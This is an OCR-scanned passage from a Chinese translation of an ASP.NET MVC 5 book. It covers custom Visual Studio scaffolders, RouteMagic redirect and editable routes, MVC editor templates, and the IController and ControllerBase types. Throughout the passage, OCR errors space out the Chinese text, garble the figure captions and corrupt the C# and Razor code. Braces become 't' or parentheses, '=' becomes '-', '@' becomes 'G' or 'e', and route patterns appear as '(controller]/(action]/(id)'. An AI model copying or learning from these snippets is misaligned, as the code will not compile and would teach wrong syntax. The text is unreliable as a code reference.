话 框 中 。 考虑 到 ASPNET 基 架 系统 可 以 工作 在 任何 ASPNET 项 目 中 , 这 种 功能 显得 越发 强大 。 

可 以 想到 ， 这 种 程度 的 自 定 义 需 要 我 们 付出 一 些 努 力 。NET Web Development and Tools 
博客 上 提供 了 一 个 完整 的 指导 : http;//blogs.msdn.com/b/webdev/archive/2014/04/03/creating- 
a-custom-scaffolder-for-visual-studio.aspx 。 

下 面 从 较 高 的 层面 上 概述 这 些 步 又 : 

(1) 安装 Visual Studio 2013 的 SideWaffle 扩 展 。 

(2) 在 Visual Studio 中 创建 一 个 新 项 目 。 

(3) 在 New Project 对 话 杠 中， 选择 Templates | Extensibility | SideWaffle 节 点 ， 然 后 选择 
BasicScaffolder 模 板 。 这 会 创建 两 个 项 目 : 一 个 VSIX 项 目 和 一 个 CodeGenerator 类 库 。 

(4) 修改 VSIX 和 代码 生成 器 中 的 元 数据 ， 以 自 定义 在 发 布 和 实例 化 时 如 何 显示 扩展 。 

(5) 修改 用 户 在 调用 我 们 的 基 架 器 时 看 到 的 对 话 框 。 在 基 架 器 执行 之 前 ， 我 们 在 这 个 对 
话 框 中 接受 用 户 输入 和 选择 的 选项 。 

(6) 实际 编写 GenerateCode 方 法 。 该 方法 负责 实际 生成 代码 。 幸 好 ， 基 架 API 提 供 了 我 们 
需要 用 到 的 实用 方法 ， 包 括 添加 文件 和 文件 夹 ， 使 用 T4 模 板 生 成 代码 ， 以 及 添加 NuGet 包 。 

(7) 测试 并 构建 解决 方案 。 这 会 创建 一 个 VSIX 文 件 。 

(8) 如 果 愿 意 ， 可 以 把 VSIX 文 件 部 署 到 Visual Studio Gallery， 以 便 与 其 他 人 共享 。 

学 习 如 何 编写 自 定 义 基 架 器 的 一 个 好 方法 是 查看 Web Forms JE 22 28 [0] Jj (C 3 : 
https://github.com/Superexpert/WebFormsScaffolding. 


16.5 ”高 级 路 由 

正如 第 9 章 结束 时 提 到 的 ， 学 习 路 由 很 容易 ， 但 是 要 完全 掌握 ， 进 而 达到 融会 贯通 的 程 
度 却 面临 很 大 的 挑战 。 下 面 是 Phil 推 荐 的 一 些 高 级 技巧 ， 以 简化 一 些 复杂 路 由 应 用 方案 。 
16.5.1 RouteMagic 


第 9 章 提 到 了 RouteMagic 项 目 ， 它 是 一 个 开源 项 目 ， 可 在 GitHub 上 下 载 ， 网 址 为 
https://github.com/Haacked/RouteMagic。 可 以 使 用 下 面 的 命令 安装 该 包 : 


Install-Package RouteMagic.Mvc 


该 项 目 也 可 以 作为 一 个 NuGet 包 获取 ， 包 的 名 称 为 RouteMagic 。RouteMagic 是 Phil 
Haack( 本 书 作者 之 一 ) 的 一 个 宠物 项 目 ， 其 中 包含 对 ASPNET 路 由 的 有 用 扩展 ， 而 在 框架 中 没 
有 这 些 扩展 。 

包含 在 RouteMagic 包 中 的 一 个 有 用 扩展 便 是 对 重 定 向 路 由 的 支持 。 正 如 可 用 性 专家 Jakob 
Nielsen 建 议 的 ,“ 持 久 的 URL 不 会 改变 ”， 重 定向 路 由 可 以 帮助 支持 这 一 功能 。 

路 由 的 好 处 之 一 是 ， 我 们 可 以 在 开发 期 间 通 过 操纵 路 由 来 改变 URL 结 构 。 这 样 站 点 上 的 
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所 有 URI 会 自动 更 新 为 正确 的 URL， 这 是 一 个 很 好 的 功能 。 但 是 一 旦 把 站 点 部 署 到 公共 服务 
器 上 ， 这 个 特性 就 变 得 有 害 了 ， 因 为 用 户 都 开始 链接 我 们 已 经 部 署 的 URL。 此 时 ， 不 能 改变 
路 由 ， 否 则 会 破坏 传 入 的 每 一 个 URL。 

但 此 时 我 们 可 以 进行 重 定向 。 安 装 RouteMagic 之 后 ， 我 们 可 以 编写 重 定向 路 由 来 接收 原 
来 路 由 的 URL， 并 把 它 重 定向 到 一 个 新 路 由 ， 代 码 如 下 : 

var newRoute = routes.MapRoute ("new", "bar/{controller}/{id}/{action}"); 

routes.Redirect(r => r.MapRoute ("oldRoute", 

"foo/(controller]/(action]/(id)") 

) .To (newRoute) ; 

如 果 想 更 深入 地 学 习 RouteMagic， 请 登录 RouteMagic 网 站 : https://github.com/Haacked/ 
RouteMagic。 在 那里 ， 我 们 会 发 现 RouteMagic 是 路 由 应 用 中 一 个 不 可 或 缺 的 工具 。 


16.5.2 可 编辑 路 由 


通常 情况 下 ，ASPNET MVC 应 用 程序 一 旦 部 署 ， 就 不 能 再 改变 它 的 路 由 ， 除 非 重 新 编 
译 应 用 程序 ， 重 新 部 署 定 义 路 由 的 程序 集 。 

更 改 路 由 需要 重新 编译 部 署 的 部 分 原因 在 于 设计 ， 因 为 路 由 通常 认为 是 应 用 程序 代码 ， 
并 且 应 该 有 相关 的 单元 测试 来 证 实 路 由 的 正确 性 。 一 个 配置 错误 的 路 由 可 能 会 严重 破坏 应 用 
程序 。 

但 是 还 存在 许多 情形 ， 可 以 在 不 用 重 编译 应 用 程序 的 情况 下 ， 很 容易 地 修改 应 用 程序 的 
路 由 ， 比 如 高 度 灵活 的 内 容 管理 系统 或 博客 引擎 。 
前 面 提 到 的 RouteMagic 项 目 支持 在 程序 运行 时 修改 路 由 。 首 先 ， 向 ASPNET MVC 5 应 用 
程序 的 App_Start 目 录 下 添加 新 的 Routes 类 ， 如 图 16-12 所 示 。 

然后 使 用 Visual Studio 的 Properties 对 话 框 把 文件 的 Build Action 属 性 标记 为 Content， 以 免 
它 被 编译 到 应 用 程序 中 ， 如 图 16-13 所 示 。 

ECET E 


F Solution ‘EditableRoutesDemo’ (1 project) 
4 F) EditableRoutesDemo 


b c IdentityConfig.cs 
p © RouteConfig-cs 


Custom Tool 
Custom Tool Namespace 


File Name Routes. 
Full Path c\users\jon\doci 
hg 
D Project Readme html. Advanced 
P e sat 
b 4 Web.config 
图 16-12 图 16-13 


作者 有 意 从 创建 时 编译 中 排除 Route.cs 文 件 ， 因 为 我 们 希望 能 够 在 运行 时 动态 地 编译 它 。 
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下 面 是 文件 Routes cs 中 的 代码 。 不 必 担心 手 动 输入 这 些 代码 ; 本 节 最 后 会 提供 它 的 NuGet 包 。 


using System.Web.Mvc; 
using System.Web.Routing; 
using RouteMagic; 
public class Routes : IRouteRegistrar 
t 
public void RegisterRoutes (RouteCollection routes) 
t 
routes.IgnoreRoute ("(resource].axd/(*pathInfo]"); 
routes.MapRoute( 
name: "Default", 
url: "(controller]/[(action]/(id)", 
defaults: new ( controller - "Home", 
action - "Index", 
id = UrlParameter.Optional } 


注意 ”RouteMagic 编 译 系统 将 会 查找 一 个 没有 名 称 空 间 的 类 Routes。 如 果 使 
用 不 同 的 类 名 称 或 者 忘记 删除 名 称 空间 ， 路 由 就 不 能 注册 。 


Routes 类 是 实现 了 定义 在 RouteMagic 程 序 集 的 接口 耻 outeRegistrar。 接 口中 定义 了 方法 
RegisterRoutes. 


然后 在 App_StarURouteConfig .cs 修改 路 由 注册 ， 以 便 使 用 新 扩展 方法 注册 路 由 


using System; 
using System.Collections.Generic; 
using System.Linq; 
using System.Web; 
using System.Web.Mvc; 
using System.Web.Routing; 
using RouteMagic; 
namespace Wrox.ProMvc5.EditableRoutes 
t 
public class RouteConfig 
t 
public static void RegisterRoutes (RouteCollection routes) 
t 
RouteTable.Routes.RegisterRoutes ("-/App Start/Routes.cs"); 
H 


} 


完成 这 些 之 后 ， 我 们 就 可 以 在 部 署 应 用 程序 之 后 ， 在 App_Start 目 录 中 的 Routes.cs 文 件 中 
修改 路 由 ， 而 不 必 重 新 编译 应 用 程序 。 

为 了 在 操作 中 看 到 效果 ， 我 们 可 以 运行 应 用 程序 ， 查 看 出 现 的 标准 主页 。 然 后 ， 在 应 用 
程序 运行 的 情况 下 ， 修 改 默 认 路 由 ， 把 Account 控 制 器 和 Login 操 作 设 置 为 路 由 默认 : 


using System.Web.Mvc; 
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using System.Web.Routing; 
using RouteMagic; 


public class Routes : IRouteRegistrar 
t 
public void RegisterRoutes (RouteCollection routes) 
i 
routes.IgnoreRoute ("(resource].axd/(*pathInfo]"); 
routes.MapRoute( 
name: "Default", 


url: "(controller]/(action]/(id])", 
defaults: new ( controller - "Account", 
action - "Login", 


id = UrlParameter.Optional } 


) 
i 


当 我 们 刷新 页 面 时 ， 就 会 看 到 出 现 的 是 Login 视 图 。 
可 编辑 路 由 : 内 幕 


前 面部 分 介绍 了 可 编辑 路 由 的 使 用 方法 。 如 果 感 兴趣 ， 下 面 介绍 可 编辑 路 由 的 工作 原理 。 

可 编辑 路 由 使 用 方法 看 似 简单 , 那 是 因为 我 们 隐藏 了 RouteCollection 扩 展 方法 中 的 所 有 
复杂 内 容 。 方 法 中 我 们 使 用 了 两 个 技巧 来 动态 生成 中 等 信任 的 路 由 代码 ， 而 不 必 重 启 应 用 
程序 : 

(1) 我 们 使 用 ASPNET BuildManager 来 动态 创建 Routes.cs 文 件 中 的 程序 集 。 然 后 根据 该 程 
序 集 ， 我 们 可 以 创建 Routes 类 型 的 实例 ， 并 把 创建 的 实例 转换 为 IRouteHandler 类 型 。 

Q) 我 们 使 用 ASPNET Cache 可 以 得 到 Routes.cs 文 件 改变 的 通知 ,所 以 知道 该 文件 需要 重 
新 创建 。 当 文件 改变 (使 Cache 无 效 ) 时 ，ASPNET Cache 人 允许 我 们 在 文件 和 调用 方法 上 设置 组 
存 依赖 。 

RouteMagic 使 用 下 面 的 代码 添加 指向 Routes.cs 文 件 和 回调 方法 的 缓存 依赖 ， 当 改变 
Routes.cs 文 件 时 ， 指 向 的 回调 方法 可 以 用 来 重新 载 入 路 由 : 


using System; 
using System.Web.Compilation; 
using System.Web.Routing; 
using RouteMagic.Internals; 
namespace RouteMagic 
{ 
public static class RouteRegistrationExtensions 
{ 
public static void RegisterRoutes 
(this RouteCollection routes, 
string virtualPath) 


if (String.IsNullOrEmpty (virtualPath)) 
{ 

throw new ArgumentNullException("virtualPath"); 
5 
routes.ReloadRoutes (virtualPath); 
ConfigFileChangeNotifier.Listen(virtualPath, 
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routes.ReloadRoutes); 
} 
static void ReloadRoutes (this RouteCollection routes, 
string virtualPath) 
t 
var assembly = BuildManager.GetCompiledAssembly( 
virtualPath); 
var registrar = assembly.CreateInstance ("Routes") 
as IRouteRegistrar; 
using (routes.GetWriteLock()) 
t 
routes.Clear(); 
if (registrar !- null) 
t 
registrar.RegisterRoutes (routes); 
) 


! 

} 

还 有 一 个 有 趣 的 技巧 : 文件 更 新 通知 的 实现 是 利用 了 ASPNET 团 队 成 员 David Ebbo 在 
ASPNET Dynamic Data 基 架 系统 上 的 成 果 ConfigFileChangeNotifier。 如果 需要 代码 , 想 更 深入 
地 了 解 技术 背景 ， 请 访问 Phil Haack 的 博客 ， 网 址 为 http://haacked.com/archive/2010/01/17/ 
editable-routes.aspx o 


16.6 ”高 级 模板 


第 5 章 引 入 了 模板 辅助 方法 。 模 板 辅助 方法 是 HTML 辅助 方法 的 子 集 , 其 中 包括 EditorFor 
和 DisplayFor 辅 助 方法 。 因 为 它们 使 用 模型 元 数据 和 模板 来 泻 染 HTML 标 记 ， 所 以 通常 称 为 模 
板 辅助 方法 。 为 了 唤起 记忆 ， 想 象 下 面 所 示 的 一 个 模型 对 象 上 的 Price 属 性 。 

public decimal Price { get; set; } 

可 以 使 用 EditorFor 辅 助 方 法 为 Price 属 性 创建 一 个 输入 : 

QHtml .EditorFor (m=>m.Price) 

泻 染 的 结果 HTML 如 下 所 示 : 


«input class-"text-box single-line" id-"Price" 

name-"Price" type-"text" value-"8.99" /» 

前 面 已 经 介绍 了 如 何 通 过 数据 注解 特性 ( 像 Display 和 DisplayFormat) 和 添加 模型 元 数据 来 
改变 辅助 方法 的 输出 。 到 目前 为 止 , 我们 还 没有 讲解 如 何 使 用 自 定义 的 模板 ， 重 写 默 认 MVC 
模板 以 改变 输出 。 自 定义 模板 简单 而 强大 ， 但 是 在 介绍 构建 自 定义 模板 之 前 ， 我 们 首先 介绍 
内 置 模板 的 工作 机 制 。 
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16.6.1 默认 模板 


ASPNET MVC 框 架 包 含 一 组 内 置 的 模板 ,模板 辅助 方法 可 以 用 它们 来 构建 HTML。 每 个 
辅助 方法 根据 模型 的 信息 (模型 类 型 和 模型 元 数据 ) 选 择 一 个 模板 。 例 如 ， 下 面 是 一 个 名 为 
IsDiscounted 的 bool 类 型 属性 : 


public bool IsDiscounted { get; set; } 


再 次 使 用 EditorFor 辅 助 方 法 创建 该 属性 的 输入 : 


QHtml.EditorFor (m-»m.IsDiscounted) 


这 次 ， 辅 助 方法 泻 染 了 一 个 复 选 框 输入 元 素 ， 而 为 Price 属 性 泻 染 的 编辑 器 却 是 一 个 文本 
框 输入 元 素 : 
«input class-"check-box" id-"IsDiscounted" name-"IsDiscounted" 


type-"checkbox" value-"true" /» 
«input name-"IsDiscounted" type-"hidden" value-"false" /» 


事实 上 , 辅助 方法 泻 染 了 两 个 输入 标签 (对 于 第 2 个 隐藏 的 输入 元 素 , 第 5 章 的 5.3.5 节 已 给 
出 原因 ), 但 是 它们 在 输出 时 的 主要 区 别 是 因为 EditorFor 辅 助 方法 对 bool 类 型 属性 和 decimal 类 
型 属性 采用 了 不 同 的 模板 。 为 bool 类 型 值 提供 复 选 框 输入 元 素 ， 而 为 decimal 类 型 属性 值 提供 
一 个 较为 自由 的 文本 输入 框 ， 这 样 做 更 有 意义 。 

1. ”模板 定义 

可 以 认为 ， 模 板 类 似 于 部 分 视图 一 一 它们 拥有 一 个 模型 参数 并 泻 染 为 HTML 标 记 。 除 非 
模型 元 数据 指定 模板 ， 和 否则 模板 辅助 方法 将 根据 它 泻 染 值 的 类 型 名 称 选择 模板 。 当 请 求 泻 染 
类 型 为 System.Boolean 的 属性 ( 像 Discounted) 时 ，EditorFor 会 使 用 模板 Boolean。 而 当 请 求 泻 


染 类 型 为 System.Decimal 的 属性 ( 像 Price)j 时 ，EditorFor 会 使 用 模板 Decimal。 接 下 来 详细 介绍 
模板 选择 。 


默认 模板 


我 们 能 不 能 查看 MVC 的 默认 模板 ， 以 了 解 其 工作 原理 或 者 对 其 稍 做 调整 呢 ? 很 遗憾 ， 默 
认 模 板 是 在 System .Web.Mvc.dll 的 代码 中 直接 实现 的 ， 而 没有 以 模板 格式 实现 。 

下 面 显示 Decimal 和 Boolean 模 板 的 例子 取 自 ASPNET MVC 3 Futures 库 自 带 的 示例 ， 只 是 
将 其 从 Web Forms 视 图 引擎 语法 改 为 了 Razor 语 法 。 当 前 的 默认 模板 没有 官方 信息 源 ， 不 过 阅 
读 它们 的 源 代 码 可 以 很 好 地 理解 它们 的 原理 : http://aspnetwebstack.codeplex.com/ 
SourceControl/latest#src/System. Web.Mvc/Html/DefaultEditor Templates.cs。 


使 用 Razor 语 法 时 ， 默 认 的 Decimal 模 板 的 代码 如 下 所 示 : 
eusing System.Globalization 
GHtml.TextBox("", FormattedValue, new { eclass = "text-box single-line" }) 


efunctions 
t 
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private object FormattedValue ( 
get ( 
if (ViewData.TemplateInfo.FormattedModelValue == 
ViewData.ModelMetadata.Model) ( 
return String.Format( 
CultureInfo.CurrentCulture, 
"(0:00.00)", ViewData.ModelMetadata.Model 
); 
) 
return ViewData.TemplateInfo.FormattedModelValue; 


k 


模板 使 用 TextBox 辅 助 方法 创建 了 一 个 带 有 格式 化 模型 值 的 text 类 型 的 输入 元 素 。 注 意 该 
模板 也 使 用 了 ViewData 的 ModelMetadata 和 TemplateInfo 属 性 中 的 信息 。ViewData 包 含 了 模板 中 
可 能 用 到 的 大 量 信息 ， 甚 至 最 简单 的 模板 ，String 模 板 也 使 用 ViewData。 

G(GHtml.TextBox("", ViewData.TemplateInfo.FormattedModelValue, 

new ( @class = "text-box single-line" }) 

ViewData 的 TemplateInfo 属 性 可 以 访问 FormattedModelValue 属 性 。 该 属性 的 值 要 么 是 作为 
字符 串 格 式 化 的 模型 值 (根据 ModelMetadata 中 的 格式 字符 串 ), 要 么 是 原始 模型 值 (如 果 没 有 指 
定格 式 字 符 串 的 话 )。ViewData 也 可 以 授权 对 模型 元 数据 的 访问 。 在 Boolean 编 辑 器 模板 (也 就 
是 前 面 框架 为 IsDiscounted 属 性 所 使 用 的 模板 ) 中 ， 我 们 看 到 了 运行 中 的 模型 元 数据 。 


@using System.Globalization 


Qif (ViewData.ModelMetadata.IsNullableValueType) { 
@Html .DropDownList("", TriStateValues, 
new { @class = "list-box tri-state" }) 
} else { 
@Html.CheckBox("", Value ?? false, 
new { @class = "check-box" }) 
} 


@functions { 
private List<SelectListItem> TriStateValues { 
get { 
return new List<SelectListItem> { 
new SelectListItem { 
Text = "Not Set", Value = String.Empty, 
Selected = !Value.HasValue 
b; 
new SelectListItem { 
Text = "True", Value = "true", 
Selected - Value.HasValue && Value.Value 
u 
new SelectListItem ( 
Text = "False", Value = "false", 
Selected - Value.HasValue && !Value.Value 


) 


第 16 章 高 级 主题 


} 
} 
private bool? Value { 
get { 
if (ViewData.Model -- null) ( 
return null; 


) 
return Convert.ToBoolean (ViewData.Model, 
CultureInfo.InvariantCulture); 


) 
) 
从 代码 中 可 以 看 到 ， 这 个 Boolean 模 板 为 空 的 布尔 类 型 属性 (使 用 一 个 下 拉 列 表 ) 和 非 空 布 
尔 类 型 属性 (一 个 复 选 框 ) 创 建 了 不 同 的 编辑 器 。 这 里 大 部 分 的 工作 就 是 创建 在 下 拉 列 表 中 显 
示 的 列表 项 。 


2. 模板 选择 


框架 根据 模型 的 类 型 名 称 选 择 模板 ， 比 如 对 decimal 类 型 的 属性 使 用 Decimal 模 板 来 泻 染 ， 
这 些 应 该 是 很 清晰 的 。 但 是 在 System.Web.Mvc.Html.DefaultEditorTemplates 中 没有 定义 默认 模 
板 的 类 型 应 该 用 什么 模板 来 泻 染 呢 ? 比如 说 Int32 和 DateTime 类 型 ? 
在 检查 模板 匹配 类 型 名 称 以 前 ， 框 架 首先 检查 模型 元 数据 以 确定 是 否 有 模板 存在 。 我 们 
可 以 使 用 UIHint 数 据 注解 特性 来 指定 要 使 用 的 模板 的 名 称 一 一 后 面 将 会 看 到 这 样 的 一 个 例 
子 。DataType 特 性 也 可 以 影响 模板 的 选择 。 
[DataType (DataType.MultilineText)] 
public string Description ( get; set; } 
当 泻 染 上 面 描述 的 Description 属 性 时 ， 框 架 会 选择 使 用 MultilineText 模 板 。Password 的 
DataType 也 有 一 个 默认 模板 。 
如 果 框 架 不 能 根据 元 数据 找到 一 个 匹配 模板 , 它 就 会 查找 类 型 名 称 对 应 的 模板 : 对 String 
类 型 使 用 String 模 板 ; Decimal 类 型 使 用 Decimal 模 板 。 对 于 没有 匹配 模板 的 类 型 ， 如 果 它 不 是 
复合 类 型 ， 框 架 就 会 使 用 String 模 板 ， 如 果 它 是 一 个 集合 (如 数组 或 列表 )， 框 架 就 会 使 用 
Collection 模 板 。 而 Object 模 板 可 以 泻 染 所 有 复合 类 型 的 对 象 。 例 如 ， 在 MVC Music Store 的 
Album 模 型 上 使 用 EditorForModel 辅 助 方法 就 会 采用 Object 模 板 。Object 是 一 个 复杂 模板 ， 它 
使 用 反射 和 模型 元 数据 来 为 模型 上 的 相应 属性 创建 HIML 标 记 。 
if (ViewData.TemplateInfo.TemplateDepth > 1) ( 


if (Model -- null) ( 
eviewData.ModelMetadata.NullDisplayText 


} 
else ( 
eviewData.ModelMetadata.SimpleDisplayText 
} 
} 
else { 
foreach (var prop in ViewData.ModelMetadata 
.Properties 
-Where(pm -» ShouldShow(pm))) ( 
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if (prop.HideSurroundingHtml) ( 
@Htm]l .Editor (prop.PropertyName) 
} 
else ( 
if (!String.IsNullOrEmpty( 
Html.Label(prop.PropertyName).ToHtmlString())) ( 
«div class-"editor-label"» 
eHtml.Label(prop.PropertyName) 
«/div» 
) 
«div class-"editor-field"» 
GHtml.Editor (prop.PropertyName) 
GHtml.ValidationMessage (prop.PropertyName, "*") 
«/div» 


H 
) 
Gfunctions ( 
bool ShouldShow(ModelMetadata metadata) ( 
return metadata.ShowForEdit 
&& !metadata.IsComplexType 
&& !ViewData.TemplateInfo.Visited (metadata); 
} 
} 


上 述 Object 模 板 代码 中 的 if 重 句 确保 了 模板 只 遍历 对 象 中 的 一 层 。 换 言 之 ,对 于 一 个 带 有 
复合 属性 的 复合 对 象 ，Object 模 板 只 显示 复合 属性 的 一 个 简单 汇总 (使 用 模型 元 数据 中 的 
NullDisplayText 或 SimpleDisplayText)。 

如 果 不 想 要 Object 模 板 的 行为 或 任何 内 置 模板 的 行为 ， 那 么 我 们 可 以 定义 自己 的 模板 来 
重 写 这 些 默 认 模板 。 


16.6.2” 自 定义 模板 


自 定义 的 模板 存放 在 DisplayTemplates 或 EditorTemplates 文 件 夹 中 。 当 解析 模板 路 径 时 ， 
ASPNET MVC 框 架 会 遵循 一 组 熟悉 的 规则 。 首先 , 它 查 看 与 一 个 特定 控制 器 视图 相关 的 文件 
夹 ， 此 外 ， 它 也 查看 文件 夹 Views/Shared 以 确定 是 否 存在 自 定义 模板 。 框 架 会 查找 与 配置 到 
应 用 程序 的 每 一 个 视图 引擎 相关 的 模板 , 因此 默认 情况 下 , 框架 查找 拥有 .aspx、.ascx 和 .cshtml 
扩展 名 的 模板 。 

作为 一 个 例子 ， 假 设 现在 要 创建 一 个 自 定 义 的 Object 模板 ， 但 只 能 得 到 与 MVC Music 
Store 的 StoreManager 控 制 器 相关 的 视图 。 在 这 样 的 情形 下 ， 我 们 可 以 在 Views/StoreManager 文 件 
夹 下 创建 一 个 EditorTemplate， 并 且 创 建 一 个 Razor 视 图 Object.cshtml， 如 图 16-14 所 示 。 

自 定义 模板 可 以 用 来 做 很 多 有 趣 的 事情 。 我 们 可 能 不 喜欢 与 文本 输入 相关 的 默认 样式 
(text-box single-line)， 此 时 ， 我 们 可 以 使 用 自己 的 样式 创建 String 编 辑 器 模板 ， 并 把 它 放 在 
Shared\EditorTemplates 文 件 夹 中 ， 以 便 在 整个 应 用 程序 中 使 用 。 

另 一 个 例子 是 , 为 客户 端 脚本 生成 data- 特 性 (前 面 第 8 章 已 提 到 ), 例如, 现在 要 给 DateTime 
属性 的 每 一 个 编辑 器 链接 一 个 jQuery UI 的 Datepicker 小 部 件 。 默 认 情 况 下 ， 框 架 使 用 String 模 
板 演 染 一 个 DateTime 属 性 的 编辑 器 ， 但 是 我 们 可 以 创建 DateTime 模 板 来 重 写 这 一 行为 ， 因 为 
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当 框 架 辅助 方法 使 用 模板 泻 染 一 个 DateTime 值 时 ， 它 会 查找 一 个 名 为 DataTime 的 模板 。 


) IActionFilter 
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Tie IExceptionFilter 
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Abstract Class | prada 
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LET | ppe | 
» 人 | P Actioninvoker | 
m Fi P asynMansger | 
Mete | P, Binders | 
9, ContolleBse | A, DisableAsyncsu...| 
9, Execute | 而 HttpContext 
9, beue — | Ø ModelState 
Ó, Initialize i P Profe 
— # Request 
# Response | 
P RouteData | 
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图 16-14 


QHtml .TextBox (""，ViewData.TemplateInfo.FormattedModelValue， 
new ( @class = "text-box single-line", 
data datepicker-"true" 
hi 


我 们 把 上 面 的 代码 放 入 名 为 DateTime.cshtml 的 文件 中 ， 再 把 该 文件 放 入 
Shared\EditorTemplates 文 件 夹 中 。 然 后 ， 如 果 要 为 每 个 DateTime 属 性 编辑 器 添加 Datepicker 小 
部 件 的 话 ， 我 们 需要 做 的 就 是 编写 一 小 段 客 户 端 脚本 (确保 第 8 章 中 介绍 的 jQuery UI 脚本 和 样 
式 表 也 包含 在 内 ): 


$(function () ( 
$(":input[data-datepicker-true]").datepicker(); 
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); 


现在 假设 不 想 让 每 一 个 DateTime 编 辑 器 都 拥有 Datepicker 小 部 件 , 而 是 让 一 少 部 分 特定 的 
编辑 器 拥有 。 此 时 ， 可 以 把 自 定义 的 模板 文件 命名 为 SpecialDateTime.cshtml。 这 样 框 架 就 不 
会 为 DateTime 模 型 选择 该 模板 ， 除 非 指定 该 模板 名 称 。 我 们 可 以 使 用 EditorFor 辅 助 方法 来 指 
定 模板 名 称 。 在 下 面 例子 中 ， 演 染 一 个 名 为 ReleaseDate 的 DateTime 属 性 : 


GHtml.EditorFor(m => m.ReleaseDate, "SpecialDateTime") 


另外 ， 也 可 以 在 ReleaseDate 属 性 上 放置 一 个 UIHint 特 性 来 指定 模板 名 称 ; 


[UIHint ("SpecialDateTime")] 
public DateTime ReleaseDate ( get; set; 


自 定义 模板 是 一 种 强大 的 机 制 ， 可 以 用 来 减少 应 用 程序 代码 的 编写 量 。 通 过 在 模板 内 部 
放置 标准 约定 ， 我 们 就 可 以 实现 只 修改 一 个 文件 而 使 应 用 程序 发 生 巨 大 的 变化 。 


NuGet 上 的 自 定义 模板 
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一 些 非常 有 用 的 EditorTemplates 集 合 以 NuGet 包 的 形式 提供 。 例 如 ， 有 一 个 
Html5EditorTemplates 包 添加 了 对 HTML5 表 单元 素 的 支持 。 通 过 搜索 EditorTemplates 标 签 可 找 
到 这 些 NuGet 包 : http://www.nuget.org/packages?q=Tags%3A%22EditorTemplates%22。 


16.7 ”高 级 控制 器 


作为 ASPNET MVC 栈 的 中 流 研 柱 ， 控 制 器 具有 很 多 高 级 特性 ， 远 超出 第 2 章 所 介绍 的 内 
容 。 本 节 介绍 控制 器 的 内 部 工作 原理 ， 以 及 在 一 些 高 级 应 用 中 使 用 它 的 方法 。 


16.7.1 定义 控制 器 : IController 接 口 


至 此 已 经 掌握 了 控制 器 的 基础 知识 ， 现 在 我 们 从 更 结构 化 的 角度 学 习 如 何 定义 和 使 用 控 
制 器 。 到 现在 为 止 ， 我 们 通过 聚焦 控制 器 的 任务 来 简化 处 理 。 要 彻底 看 清 控制 器 ， 我 们 需要 
理解 IController 接 口 。 正 如 第 1 章 所 讨论 的 ，ASPNET MVC 的 重点 之 一 便 是 扩展 性 和 灵活 性 。 
当 使 用 这 种 方式 构建 软件 时 ， 通 过 使 用 接口 尽 可 能 地 利用 抽象 是 很 重要 的 。 

ASPNET MVC 中 的 控制 器 类 最 起 码 需 要 实现 IController 接 口 ， 而 且 按 照 约定 ， 类 型 的 名 
称 还 必须 以 Controller 后 级 结束 。 该 命名 约定 实际 上 是 非常 重要 的 一 一 我 们 会 发 现 ASPNET 
MVC 中 有 很 多 这 样 的 小 规则 , 它们 使 我 们 免 去 了 定义 配置 设置 和 特性 的 任务 而 使 程序 开发 更 
加 容易 。 然 而 ，IController 接 口 的 抽象 功能 却 非常 简单 : 

public interface IController 

j void Execute (RequestContext requestContext); 

$ 

这 是 一 个 非常 简单 的 过 程 : 当 一 个 请 求 进入 时 ， 路 由 系统 标识 一 个 控制 器 ， 并 调用 其 中 
的 Execute 方 法 。 
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IController 主 要 是 为 每 个 想 把 自 定义 控制 器 框架 挂钩 到 ASPNET MVC 的 人 ， 提 供 一 个 非 
常 简 单 的 接口 。 本 章 后 面 讲 到 的 Controller 类 ， 就 是 在 该 接口 上 创建 的 很 多 有 趣 的 功能 之 一 。 
这 正 是 ASPNET 中 常见 的 扩展 模式 。 

例如 , 如 果 熟 悉 HTTP 处 理 程序 , 可 能 注意 到 IController 接 口 和 IHttpHandler 接 口 非常 相似 : 


public interface IHttpHandler 

{ 
void ProcessRequest (HttpContext context); 
bool IsReusable { get; } 

$ 


暂时 不 考虑 IsReusable 属 性 ， 从 IController 和 IHttpHandler 的 作用 来 看 ， 它 们 两 个 几乎 是 相 
同 的 。IController Execute 和 IHttpHandler.ProcessRequest 两 个 方法 都 用 来 响应 请 求 ， 并 向 响应 
流 中 发 送 一 些 输出 。 二 者 的 主要 区 别 是 参数 提供 的 上 下 文 信息 量 不 一 样 。IControllerExecute 
方法 接收 一 个 RequestContext 实 例 ， 其 中 不 仅 包 括 HttpContext， 也 包括 ASPNET MVC 请 求 的 
其 他 相关 信息 。 

Page 类 可 能 是 ASPNET Web Forms 开 发 人 员 最 熟悉 的 类 ， 由 于 它 是 ASPX 页 面 的 默认 基 
因此 也 实现 了 IHttpHandler 接 口 。 


类 


16.7.2 ”ControllerBase 抽 象 基 类 


正如 刚才 看 到 的 ， IController 接 口 的 实现 非常 简单 ， 但 它 的 真正 作用 是 为 路 由 查找 控制 
器 和 调用 Execute 方 法 提供 便利 。 这 是 挂钩 到 请 求 系 统 的 最 基本 钩子 (hook)， 但 是 整体 而 言 它 
基本 上 没有 为 编写 的 控制 器 提供 什么 价值 。 这 可 能 是 一 件 好 事 一 一 当 对 自 定义 的 系统 强加 很 
多 限制 时 ， 许 多 自 定 义 开发 工具 的 开发 人 员 都 会 不 喜欢 。 一 些 开 发 人 员 可 能 喜欢 靠近 API 工 
作 ，ControllerBase 由 此 而 生 。 


产品 小 组 的 话 


早期 ，ASPNETMVC 产 品 团队 曾经 辩论 过 是 否 完全 删除 IController 接 口 。 想 实现 该 接口 


的 开发 人 员 可 以 通过 实现 他 们 自己 的 MvcHandler 来 代替 ， 因 为 MvcHandler 可 以 根据 来 自 路 由 
的 请 求 果断 处 理 很 多 核心 执行 机 制 。 

然而 ， 最 终 决定 保留 IController 接 口 ， 因 为 ASPNET MVC 框 架 的 其 他 特性 ( 像 
IControllerFactory 和 ControllerBuilder) 可 以 直接 与 它 交 互 一 一 这 给 开发 人 员 提供 了 附加 值 。 


ControllerBase 类 是 一 个 抽象 基 类 ， 它 在 IController 接 口上 实现 了 很 多 API。 它 提供 了 
TempData 和 ViewData 属 性 (它们 是 向 视图 发 送 数 据 的 方式 ， 正 如 第 3 章 中 讨论 的 )。 此 外 ， 
ControllerBase 还 提供 了 Execute 方 法 用 来 创建 ControllerContext。 与 HttpContext 实 例 向 ASPNET 
提供 上 下 文 (在 元 素 之 间 提 供 请 求 和 响应 、URL 和 服务 器 信息 ) 类 似 ， 创 建 的 ControllerContext 
实例 为 当前 请 求 提 供 具体 的 MVC 上 下 文 。 

